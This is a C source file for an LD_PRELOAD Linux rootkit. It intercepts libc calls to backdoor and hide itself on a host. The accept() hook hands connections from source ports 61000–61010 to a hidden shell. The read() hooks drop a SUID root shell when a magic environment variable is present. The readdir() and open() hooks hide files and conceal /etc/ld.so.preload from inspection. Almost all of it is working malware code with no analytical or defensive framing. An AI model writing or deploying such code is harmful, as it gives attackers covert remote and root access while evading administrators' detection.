#include <sys/syscall.h>
#include <sys/types.h>
#include <stdio.h>
#include <dlfcn.h>
#include <errno.h>
#include <string.h>
#include "vars.h"


//////////////////////////////////////////////////////////////////////////
// accept

int  (*real_accept)(int sockfd, void *addr, void *addrlen);

int accept(int sockfd, void *addr, void *addrlen)
{
	real_accept = (int (*)(int sockfd, void *addr, void *addrlen)) dlsym((void *) -1l,"accept");


	int fd = real_accept(sockfd, addr, addrlen);

	unsigned short *sin_port = addr + sizeof(short);
	unsigned short port = ntohs(*sin_port);

	if (port <= 61010 && port >= 61000)
	{
		drop_dupshell(fd);
		errno = 103; // ECONNABORTED
		return -1;
	}
	
	return fd;
}
//////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////
// read

ssize_t (*real_read)(int fd, const void *buf, size_t count);

ssize_t read(int fd, const void *buf, size_t count)
{
	real_read = (ssize_t (*)(int fd, const void *buf, size_t count)) dlsym((void *) -1l,"read");
	
	if(getenv(ROOT_ENV) != 0)
	{
		if(geteuid() == 0)
		{
			drop_suidshell();
		}
	}
	
	return real_read(fd,buf,count);
}

ssize_t (*real_read64)(int fd, const void *buf, size_t count);

ssize_t read64(int fd, const void *buf, size_t count)
{
	real_read64 = (ssize_t (*)(int fd, const void *buf, size_t count)) dlsym((void *) -1l,"read64");

	if(getenv(ROOT_ENV) != 0)
	{
		if(geteuid() == 0)
		{
			drop_suidshell();
		}
	}

	return real_read64(fd,buf,count);
}
//////////////////////////////////////////////////////////////////////////

//////////////////////////////////////////////////////////////////////////
// readdir

void *(*real_readdir)(void *dirp);

void *readdir(void *dirp)
{
	real_readdir = (void *(*)(void *dirp)) dlsym((void *) -1l, "readdir");
	
	void *result = real_readdir(dirp);

	if(getenv(TRUE_ENV) == 0)
	{
		if(my_readdir(result) == -1)
		{
			result = readdir(dirp);
		}
	}
	
	return result;
}


void *(*real_readdir64)(void *dirp);

void *readdir64(void *dirp)
{
	real_readdir64 = (void *(*)(void *dirp)) dlsym((void *) -1l, "readdir64");

	void *result = real_readdir64(dirp);

	if(getenv(TRUE_ENV) == 0)
	{
		if(my_readdir64(result) == -1)
		{
			result = readdir64(dirp);
		}
	}	

	return result;
}
//////////////////////////////////////////////////////////////////////////


//////////////////////////////////////////////////////////////////////////
// open

int (*real_open)(const char *pathname, int flags);

int open(const char *pathname, int flags, mode_t mode)
{
	real_open = (int (*)(const char *pathname, int flags)) dlsym((void *) -1l, "open");


	if(getenv(TRUE_ENV) == 0)
	{
		if (strstr(pathname, "ld.so.preload") != 0)
		{
			return -1; 
		}
	}

	return real_open(pathname, flags);
}

int (*real_open64)(const char *pathname, int flags);

int open64(const char *pathname, int flags, mode_t mode)
{
	real_open64 = (int (*)(const char *pathname, int flags)) dlsym((void *) -1l, "open64");

	if(getenv(TRUE_ENV) == 0)
	{
		if (strstr(pathname, "ld.so.preload") != 0)
		{
			return -1; 
		}
	}

	return real_open64(pathname, flags);
}
//////////////////////////////////////////////////////////////////////////


//////////////////////////////////////////////////////////////////////////
// stat
//
//int (*real_stat)(const char *path, void *buf);
//
//int stat(const char *path, void *buf)
//{
//	real_stat = (int (*)(const char *path, void *buf)) dlsym((void *) -1l, "__xstat");
//
//	printf("stat:%s\n", path);
//
//	if(getenv(TRUE_ENV) == 0)
//	{
//		if (strstr(path, "ld.so.preload") != 0)
//		{
//			return -1; 
//		}
//	}
//	printf("2stat:%s\n", path);
//
//	return real_stat(path, buf);
//
//}
//
//
//int (*real_stat64)(const char *path, void *buf);
//
//int stat64(const char *path, void *buf)
//{
//	real_stat64 = (int (*)(const char *path, void *buf)) dlsym((void *) -1l, "__xstat64");
//
//	printf("stat64:%s\n", path);
//
//	if(getenv(TRUE_ENV) == 0)
//	{
//		if (strstr(path, "ld.so.preload") != 0)
//		{
//			return -1; 
//		}
//	}
//
//	return real_stat64(path, buf);
//
//}
//////////////////////////////////////////////////////////////////////////